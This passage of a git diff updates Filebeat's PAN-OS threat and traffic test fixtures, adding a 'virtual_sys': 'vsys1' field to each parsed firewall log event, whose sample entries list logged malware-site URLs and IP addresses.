"liteautobestguide.cn/index.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "liteautobestguide.cn" ], @@ -866,6 +874,7 @@ "panw.panos.threat.resource": "litetopdetect.cn/index.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "litetopdetect.cn" ], @@ -965,6 +974,7 @@ "panw.panos.threat.resource": "lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lkmpmlm.com" ], @@ -1065,6 +1075,7 @@ "panw.panos.threat.resource": "girlteenxxxfreemov.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "girlteenxxxfreemov.com" ], @@ -1163,6 +1174,7 @@ "panw.panos.threat.resource": "imagesrepository.com/resolution.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "imagesrepository.com" ], @@ -1262,6 +1274,7 @@ "panw.panos.threat.resource": "hottestfiles.com/search/search.php?q=xxx", "panw.panos.type": "THREAT", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "hottestfiles.com" ], @@ -1361,6 +1374,7 @@ "panw.panos.threat.resource": "infodist1.com/in.cgi?11¶meter=404", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "infodist1.com" ], @@ -1461,6 +1475,7 @@ "panw.panos.threat.resource": "cls-softwares.com/suc.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "cls-softwares.com" ], @@ -1560,6 +1575,7 @@ "panw.panos.threat.resource": "cls-softwares.com/softwarefortubeview.40013.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "cls-softwares.com" ], @@ -1655,6 +1671,7 @@ "panw.panos.threat.resource": "findmorepill.com/klik/search.php?q=xxx", "panw.panos.type": "THREAT", "panw.panos.url.category": "online-gambling", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "findmorepill.com" ], @@ -1755,6 +1772,7 @@ "panw.panos.threat.resource": "allowedwebsurfing.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "allowedwebsurfing.com" ], @@ -1853,6 +1871,7 @@ "panw.panos.threat.resource": "antivirus-remote.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "antivirus-remote.com" ], @@ -1951,6 +1970,7 @@ "panw.panos.threat.resource": "bklinkov.ru/hi/start.cfg", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "bklinkov.ru" ], @@ -2050,6 +2070,7 @@ "panw.panos.threat.resource": "blogsexnakedgirlxxx.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "blogsexnakedgirlxxx.com" ], @@ -2148,6 +2169,7 @@ "panw.panos.threat.resource": "bklinkov.ru/hi/start.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "bklinkov.ru" ], @@ -2247,6 +2269,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2340,6 +2363,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2433,6 +2457,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2526,6 +2551,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2619,6 +2645,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2712,6 +2739,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2805,6 +2833,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2898,6 +2927,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2991,6 +3021,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3084,6 +3115,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3177,6 +3209,7 @@ "panw.panos.threat.resource": "-/", "panw.panos.type": "THREAT", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3266,6 +3299,7 @@ "panw.panos.threat.resource": "wantfinest.com/tds/in.cgi?default", "panw.panos.type": "THREAT", "panw.panos.url.category": "unknown", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "wantfinest.com" ], @@ -3362,6 +3396,7 @@ "panw.panos.threat.resource": "sameshitasiteverwas.com/traf/tds/in.cgi?2", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "sameshitasiteverwas.com" ], @@ -3458,6 +3493,7 @@ "panw.panos.threat.resource": "svarkon.ru/update.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "svarkon.ru" ], @@ -3556,6 +3592,7 @@ "panw.panos.threat.resource": "onlinescanxpp.com/land/eurl/1.php?code=", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "onlinescanxpp.com" ], @@ -3652,6 +3689,7 @@ "panw.panos.threat.resource": "nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "nolagtime.com" ], @@ -3747,6 +3785,7 @@ "panw.panos.threat.resource": "nolagtime.com/gwc.txt", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "nolagtime.com" ], @@ -3845,6 +3884,7 @@ "panw.panos.threat.resource": "karavan.us/bon/index.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "unknown", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "karavan.us" ], @@ -3940,6 +3980,7 @@ "panw.panos.threat.resource": "findnolimits.com/go.php?sid=1", "panw.panos.type": "THREAT", "panw.panos.url.category": "dead-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "findnolimits.com" ], @@ -4036,6 +4077,7 @@ "panw.panos.threat.resource": "bizoplata.ru/moun.html", "panw.panos.type": "THREAT", "panw.panos.url.category": "parked-domains", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "bizoplata.ru" ], @@ -4131,6 +4173,7 @@ "panw.panos.threat.resource": "bizoplata.ru/palast.html", "panw.panos.type": "THREAT", "panw.panos.url.category": "parked-domains", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "bizoplata.ru" ], @@ -4218,6 +4261,7 @@ "panw.panos.threat.resource": "controller.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "204.232.231.46", "192.168.0.2", @@ -4319,6 +4363,7 @@ "panw.panos.threat.resource": "www.15min.it/", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "www.15min.it" ], @@ -4413,6 +4458,7 @@ "panw.panos.threat.resource": "tubemov.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "adult-and-pornography", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "tubemov.com" ], @@ -4507,6 +4553,7 @@ "panw.panos.threat.resource": "pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "pagesinxt.com" ], @@ -4602,6 +4649,7 @@ "panw.panos.threat.resource": "movfree.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "spyware-and-adware", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "movfree.com" ], @@ -4699,6 +4747,7 @@ "panw.panos.threat.resource": "gometascan.com/", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "gometascan.com" ], @@ -4796,6 +4845,7 @@ "panw.panos.threat.resource": "antivirus-powerful-scannerv2.com/download/Install_11-1.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "antivirus-powerful-scannerv2.com" ], @@ -4894,6 +4944,7 @@ "panw.panos.threat.resource": "antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "antivirus-powerful-scannerv2.com" ], @@ -4992,6 +5043,7 @@ "panw.panos.threat.resource": "basdzsdas.com/poker/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "basdzsdas.com" ], @@ -5090,6 +5142,7 @@ "panw.panos.threat.resource": "basdzsdas.com/poker/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "basdzsdas.com" ], @@ -5180,6 +5233,7 @@ "panw.panos.threat.resource": "uLLGRaXP.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "173.236.179.57", "192.168.0.2", @@ -5281,6 +5335,7 @@ "panw.panos.threat.resource": "basdzsdas.com/poker/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "basdzsdas.com" ], @@ -5371,6 +5426,7 @@ "panw.panos.threat.resource": "FunkyEmoticons_setup.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "91.209.163.202", "192.168.0.2", @@ -5464,6 +5520,7 @@ "panw.panos.threat.resource": "52hxw.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "122.226.169.183", "192.168.0.2", @@ -5564,6 +5621,7 @@ "panw.panos.threat.resource": "softsellfast.com/test/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "softsellfast.com" ], @@ -5654,6 +5712,7 @@ "panw.panos.threat.resource": "setup.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "109.201.131.15", "192.168.0.2", @@ -5744,6 +5803,7 @@ "panw.panos.threat.resource": "Live-Player_setup.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "91.209.163.202", "192.168.0.2", @@ -5842,6 +5902,7 @@ "panw.panos.threat.resource": "boialex.narod.ru/config.txt", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "boialex.narod.ru" ], @@ -5937,6 +5998,7 @@ "panw.panos.threat.resource": "edw-melon.narod.ru/config.txt", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "edw-melon.narod.ru" ], @@ -6032,6 +6094,7 @@ "panw.panos.threat.resource": "maximtushin.narod.ru/config.txt", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "maximtushin.narod.ru" ], @@ -6122,6 +6185,7 @@ "panw.panos.threat.resource": "uLLGRaXP.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "173.236.179.57", "192.168.0.2", @@ -6223,6 +6287,7 @@ "panw.panos.threat.resource": "marketingsoluchion.biz/fkn/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "unknown", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "marketingsoluchion.biz" ], @@ -6323,6 +6388,7 @@ "panw.panos.threat.resource": "default.aspx", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.6", "207.46.140.46", @@ -6406,6 +6472,7 @@ "panw.panos.threat.resource": "sck.aspx", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "65.54.161.34", "192.168.0.6", @@ -6499,6 +6566,7 @@ "panw.panos.threat.resource": "ADSAdClient31.dll", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "65.55.5.231", "192.168.0.6", @@ -6602,6 +6670,7 @@ "panw.panos.threat.resource": "c.gif", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.6", "65.54.71.11", @@ -6684,6 +6753,7 @@ "panw.panos.threat.resource": "csi", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.17", "192.168.0.6", @@ -6781,6 +6851,7 @@ "panw.panos.threat.resource": "internal-tuner.pandora.com", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "208.85.40.48", @@ -6863,6 +6934,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.198", "192.168.0.2", @@ -6953,6 +7025,7 @@ "panw.panos.threat.resource": "about.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "188.190.124.75", "192.168.0.6", @@ -7045,6 +7118,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -7134,6 +7208,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.3", "192.168.0.2", @@ -7223,6 +7298,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.3", "192.168.0.2", @@ -7312,6 +7388,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -7409,6 +7486,7 @@ "panw.panos.threat.resource": "__utm.gif", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "74.125.239.6", @@ -7491,6 +7569,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.193", "192.168.0.2", @@ -7581,6 +7660,7 @@ "panw.panos.threat.resource": "nav_logo107.png", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.20", "192.168.0.2", @@ -7670,6 +7750,7 @@ "panw.panos.threat.resource": "Eadweard_Muybridge", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "208.80.154.225", "192.168.0.2", @@ -7760,6 +7841,7 @@ "panw.panos.threat.resource": "load.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "208.80.154.234", "192.168.0.2", @@ -7850,6 +7932,7 @@ "panw.panos.threat.resource": "8fe44cb728c0f40750c64ee906eb72.css", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "65.54.75.25", "192.168.0.6", @@ -7942,6 +8025,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.206", "192.168.0.2", @@ -8031,6 +8115,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.195", "192.168.0.2", @@ -8121,6 +8206,7 @@ "panw.panos.threat.resource": "appcast.xml", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "207.178.96.34", "192.168.0.2", @@ -8213,6 +8299,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.195", "192.168.0.2", @@ -8302,6 +8389,7 @@ "panw.panos.threat.resource": "csi", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.20", "192.168.0.2", @@ -8392,6 +8480,7 @@ "panw.panos.threat.resource": "index.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "66.152.109.24", "192.168.0.2", @@ -8484,6 +8573,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -8581,6 +8671,7 @@ "panw.panos.threat.resource": "__utm.gif", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "74.125.224.201", @@ -8663,6 +8754,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -8752,6 +8844,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -8849,6 +8942,7 @@ "panw.panos.threat.resource": "internal-tuner.pandora.com", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "208.85.40.48", @@ -8931,6 +9025,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.201", "192.168.0.2", @@ -9020,6 +9115,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.201", "192.168.0.2", @@ -9109,6 +9205,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -9198,6 +9295,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -9288,6 +9386,7 @@ "panw.panos.threat.resource": "ga.js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.198", "192.168.0.2", @@ -9377,6 +9476,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json index a4ae1b157d9..c90c76236b3 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json @@ -74,6 +74,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -171,6 +172,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -268,6 +270,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -368,6 +371,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -468,6 +472,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -565,6 +570,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -662,6 +668,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -762,6 +769,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -862,6 +870,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -962,6 +971,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1062,6 +1072,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1162,6 +1173,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1262,6 +1274,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1362,6 +1375,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1462,6 +1476,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1562,6 +1577,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1662,6 +1678,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1762,6 +1779,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1862,6 +1880,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1959,6 +1978,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2056,6 +2076,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2156,6 +2177,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2253,6 +2275,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2353,6 +2376,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2453,6 +2477,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2553,6 +2578,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2650,6 +2676,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2747,6 +2774,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2847,6 +2875,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "98.149.55.63", @@ -2947,6 +2976,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3044,6 +3074,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3144,6 +3175,7 @@ "panw.panos.sub_type": "end", 